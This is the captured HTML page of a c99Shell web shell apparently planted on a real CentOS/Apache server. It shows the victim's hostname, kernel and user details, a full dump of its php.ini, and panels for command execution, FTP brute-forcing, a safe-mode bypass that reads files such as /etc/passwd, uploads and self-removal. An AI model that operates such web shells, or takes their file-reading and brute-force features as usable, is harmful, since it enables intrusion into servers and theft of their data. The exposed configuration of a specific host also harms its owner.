!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/etc/   drwxr-xr-x
Free 51.23 GB of 127.8 GB (40.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     php.ini (44.02 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
array(26) {
  ["PHP"]=>
  array(53) {
    ["engine"]=>
    string(1) "1"
    ["zend.ze1_compatibility_mode"]=>
    string(0) ""
    ["short_open_tag"]=>
    string(1) "1"
    ["asp_tags"]=>
    string(0) ""
    ["precision"]=>
    string(2) "14"
    ["y2k_compliance"]=>
    string(1) "1"
    ["output_buffering"]=>
    string(4) "4096"
    ["zlib.output_compression"]=>
    string(0) ""
    ["implicit_flush"]=>
    string(0) ""
    ["unserialize_callback_func"]=>
    string(0) ""
    ["serialize_precision"]=>
    string(3) "100"
    ["allow_call_time_pass_reference"]=>
    string(0) ""
    ["safe_mode"]=>
    string(0) ""
    ["safe_mode_gid"]=>
    string(0) ""
    ["safe_mode_include_dir"]=>
    string(0) ""
    ["safe_mode_exec_dir"]=>
    string(0) ""
    ["safe_mode_allowed_env_vars"]=>
    string(4) "PHP_"
    ["safe_mode_protected_env_vars"]=>
    string(15) "LD_LIBRARY_PATH"
    ["disable_functions"]=>
    string(0) ""
    ["disable_classes"]=>
    string(0) ""
    ["expose_php"]=>
    string(1) "1"
    ["max_execution_time"]=>
    string(2) "30"
    ["max_input_time"]=>
    string(2) "60"
    ["memory_limit"]=>
    string(4) "128M"
    ["error_reporting"]=>
    string(2) "81"
    ["display_errors"]=>
    string(0) ""
    ["display_startup_errors"]=>
    string(0) ""
    ["log_errors"]=>
    string(1) "1"
    ["log_errors_max_len"]=>
    string(4) "1024"
    ["ignore_repeated_errors"]=>
    string(0) ""
    ["ignore_repeated_source"]=>
    string(0) ""
    ["report_memleaks"]=>
    string(1) "1"
    ["track_errors"]=>
    string(0) ""
    ["variables_order"]=>
    string(5) "EGPCS"
    ["register_globals"]=>
    string(1) "1"
    ["register_long_arrays"]=>
    string(0) ""
    ["register_argc_argv"]=>
    string(0) ""
    ["auto_globals_jit"]=>
    string(1) "1"
    ["post_max_size"]=>
    string(4) "180M"
    ["magic_quotes_gpc"]=>
    string(0) ""
    ["magic_quotes_runtime"]=>
    string(0) ""
    ["magic_quotes_sybase"]=>
    string(0) ""
    ["auto_prepend_file"]=>
    string(0) ""
    ["auto_append_file"]=>
    string(0) ""
    ["default_mimetype"]=>
    string(9) "text/html"
    ["doc_root"]=>
    string(0) ""
    ["user_dir"]=>
    string(0) ""
    ["extension_dir"]=>
    string(20) "/usr/lib/php/modules"
    ["enable_dl"]=>
    string(1) "1"
    ["file_uploads"]=>
    string(1) "1"
    ["upload_max_filesize"]=>
    string(4) "300M"
    ["allow_url_fopen"]=>
    string(1) "1"
    ["default_socket_timeout"]=>
    string(2) "60"
  }
  ["Date"]=>
  array(0) {
  }
  ["Syslog"]=>
  array(1) {
    ["define_syslog_variables"]=>
    string(0) ""
  }
  ["mail function"]=>
  array(3) {
    ["SMTP"]=>
    string(9) "localhost"
    ["smtp_port"]=>
    string(2) "25"
    ["sendmail_path"]=>
    string(24) "/usr/sbin/sendmail -t -i"
  }
  ["SQL"]=>
  array(1) {
    ["sql.safe_mode"]=>
    string(0) ""
  }
  ["ODBC"]=>
  array(6) {
    ["odbc.allow_persistent"]=>
    string(1) "1"
    ["odbc.check_persistent"]=>
    string(1) "1"
    ["odbc.max_persistent"]=>
    string(2) "-1"
    ["odbc.max_links"]=>
    string(2) "-1"
    ["odbc.defaultlrl"]=>
    string(4) "4096"
    ["odbc.defaultbinmode"]=>
    string(1) "1"
  }
  ["MySQL"]=>
  array(10) {
    ["mysql.allow_persistent"]=>
    string(1) "1"
    ["mysql.max_persistent"]=>
    string(2) "-1"
    ["mysql.max_links"]=>
    string(2) "-1"
    ["mysql.default_port"]=>
    string(0) ""
    ["mysql.default_socket"]=>
    string(0) ""
    ["mysql.default_host"]=>
    string(0) ""
    ["mysql.default_user"]=>
    string(0) ""
    ["mysql.default_password"]=>
    string(0) ""
    ["mysql.connect_timeout"]=>
    string(2) "60"
    ["mysql.trace_mode"]=>
    string(0) ""
  }
  ["MySQLi"]=>
  array(7) {
    ["mysqli.max_links"]=>
    string(2) "-1"
    ["mysqli.default_port"]=>
    string(4) "3306"
    ["mysqli.default_socket"]=>
    string(0) ""
    ["mysqli.default_host"]=>
    string(0) ""
    ["mysqli.default_user"]=>
    string(0) ""
    ["mysqli.default_pw"]=>
    string(0) ""
    ["mysqli.reconnect"]=>
    string(0) ""
  }
  ["mSQL"]=>
  array(3) {
    ["msql.allow_persistent"]=>
    string(1) "1"
    ["msql.max_persistent"]=>
    string(2) "-1"
    ["msql.max_links"]=>
    string(2) "-1"
  }
  ["PostgresSQL"]=>
  array(6) {
    ["pgsql.allow_persistent"]=>
    string(1) "1"
    ["pgsql.auto_reset_persistent"]=>
    string(0) ""
    ["pgsql.max_persistent"]=>
    string(2) "-1"
    ["pgsql.max_links"]=>
    string(2) "-1"
    ["pgsql.ignore_notice"]=>
    string(1) "0"
    ["pgsql.log_notice"]=>
    string(1) "0"
  }
  ["Sybase"]=>
  array(6) {
    ["sybase.allow_persistent"]=>
    string(1) "1"
    ["sybase.max_persistent"]=>
    string(2) "-1"
    ["sybase.max_links"]=>
    string(2) "-1"
    ["sybase.min_error_severity"]=>
    string(2) "10"
    ["sybase.min_message_severity"]=>
    string(2) "10"
    ["sybase.compatability_mode"]=>
    string(0) ""
  }
  ["Sybase-CT"]=>
  array(5) {
    ["sybct.allow_persistent"]=>
    string(1) "1"
    ["sybct.max_persistent"]=>
    string(2) "-1"
    ["sybct.max_links"]=>
    string(2) "-1"
    ["sybct.min_server_severity"]=>
    string(2) "10"
    ["sybct.min_client_severity"]=>
    string(2) "10"
  }
  ["bcmath"]=>
  array(1) {
    ["bcmath.scale"]=>
    string(1) "0"
  }
  ["browscap"]=>
  array(0) {
  }
  ["Informix"]=>
  array(11) {
    ["ifx.default_host"]=>
    string(0) ""
    ["ifx.default_user"]=>
    string(0) ""
    ["ifx.default_password"]=>
    string(0) ""
    ["ifx.allow_persistent"]=>
    string(1) "1"
    ["ifx.max_persistent"]=>
    string(2) "-1"
    ["ifx.max_links"]=>
    string(2) "-1"
    ["ifx.textasvarchar"]=>
    string(1) "0"
    ["ifx.byteasvarchar"]=>
    string(1) "0"
    ["ifx.charasvarchar"]=>
    string(1) "0"
    ["ifx.blobinfile"]=>
    string(1) "0"
    ["ifx.nullformat"]=>
    string(1) "0"
  }
  ["Session"]=>
  array(23) {
    ["session.save_handler"]=>
    string(5) "files"
    ["session.save_path"]=>
    string(20) "/var/lib/php/session"
    ["session.use_cookies"]=>
    string(1) "1"
    ["session.name"]=>
    string(9) "PHPSESSID"
    ["session.auto_start"]=>
    string(1) "0"
    ["session.cookie_lifetime"]=>
    string(1) "0"
    ["session.cookie_path"]=>
    string(1) "/"
    ["session.cookie_domain"]=>
    string(0) ""
    ["session.serialize_handler"]=>
    string(3) "php"
    ["session.gc_probability"]=>
    string(1) "1"
    ["session.gc_divisor"]=>
    string(4) "1000"
    ["session.gc_maxlifetime"]=>
    string(4) "1800"
    ["session.bug_compat_42"]=>
    string(1) "0"
    ["session.bug_compat_warn"]=>
    string(1) "1"
    ["session.referer_check"]=>
    string(0) ""
    ["session.entropy_length"]=>
    string(1) "0"
    ["session.entropy_file"]=>
    string(0) ""
    ["session.cache_limiter"]=>
    string(7) "nocache"
    ["session.cache_expire"]=>
    string(3) "180"
    ["session.use_trans_sid"]=>
    string(1) "0"
    ["session.hash_function"]=>
    string(1) "0"
    ["session.hash_bits_per_character"]=>
    string(1) "5"
    ["url_rewriter.tags"]=>
    string(51) "a=href,area=href,frame=src,input=src,form=fakeentry"
  }
  ["MSSQL"]=>
  array(7) {
    ["mssql.allow_persistent"]=>
    string(1) "1"
    ["mssql.max_persistent"]=>
    string(2) "-1"
    ["mssql.max_links"]=>
    string(2) "-1"
    ["mssql.min_error_severity"]=>
    string(2) "10"
    ["mssql.min_message_severity"]=>
    string(2) "10"
    ["mssql.compatability_mode"]=>
    string(0) ""
    ["mssql.secure_connection"]=>
    string(0) ""
  }
  ["Assertion"]=>
  array(0) {
  }
  ["Verisign Payflow Pro"]=>
  array(3) {
    ["pfpro.defaulthost"]=>
    string(25) "test-payflow.verisign.com"
    ["pfpro.defaultport"]=>
    string(3) "443"
    ["pfpro.defaulttimeout"]=>
    string(2) "30"
  }
  ["COM"]=>
  array(0) {
  }
  ["mbstring"]=>
  array(0) {
  }
  ["FrontBase"]=>
  array(0) {
  }
  ["gd"]=>
  array(0) {
  }
  ["exif"]=>
  array(0) {
  }
  ["Tidy"]=>
  array(1) {
    ["tidy.clean_output"]=>
    string(0) ""
  }
  ["soap"]=>
  array(3) {
    ["soap.wsdl_cache_enabled"]=>
    string(1) "1"
    ["soap.wsdl_cache_dir"]=>
    string(4) "/tmp"
    ["soap.wsdl_cache_ttl"]=>
    string(5) "86400"
  }
}

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0143 ]--